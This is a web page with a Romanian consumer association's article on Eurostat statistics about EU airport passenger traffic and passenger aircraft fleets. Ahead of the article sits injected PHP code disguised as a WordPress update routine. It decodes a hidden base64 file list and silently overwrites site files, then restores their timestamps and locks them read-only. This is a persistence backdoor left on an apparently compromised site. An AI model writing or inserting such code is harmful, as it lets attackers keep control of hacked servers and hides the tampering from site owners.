$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Transportul in Europa – Aeroporturi si avioane de pasageri – O noua atitudine

O analiza a statisticilor referitoare la transporturile in interiorul Uniunii Europene, mai specific topul tarilor in functie de numarul de aeroporturi tranzitate de calatori, arata ca Romania se situeaza la mijlocul acestui top. Tara noastra are patru aeroporturi tranzitate de un numar de calatori cuprins intre 1 si 5 milioane, trei aeroporturi tranzitate de un numar cuprins intre 100 000 si 500 000 si doua aeroporturi tranzitate de un numar de calatori cuprins intre 15 000 si 100 000 de calatori. Tarile europene cu aeroporturile cele mai  tranzitate sunt Spania, Franta si Italia. Pasagerii luati in calcul in aceasta analiza sunt pasagerii in corespondenta (care isi continua calatoria cu o alta cursa). Studiul nu include si pasagerii de tranzit direct (ce care  si-au continuat drumul cu acelasi numar de zbor).

 

Studiul privitor la numarul avioanelor de transport civil, plaseaza Romania, in partea inferioara a unui clasament facut in functie de numarul de avioane de pasageri (55 de avioane) si organizat in functie de marimea navelor de zbor (numarul de locuri). Primul loc este ocupat de Marea Britanie cu un total de 804 avioane de pasageri, urmat de Germania (673) si Franta (443). In studiu nu au fost incluse peste 30 000 de avioane mici, private.

 

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania -A.N.P.C.P.P.S. Romania – o9atitudine ! – InfoCons, unica organizatie din Romania membra cu drepturi depline in Consumers International, membra fondatoare a Federatiei Asociatiilor de Consumatori.

Sursa: Eurostat

By o9admin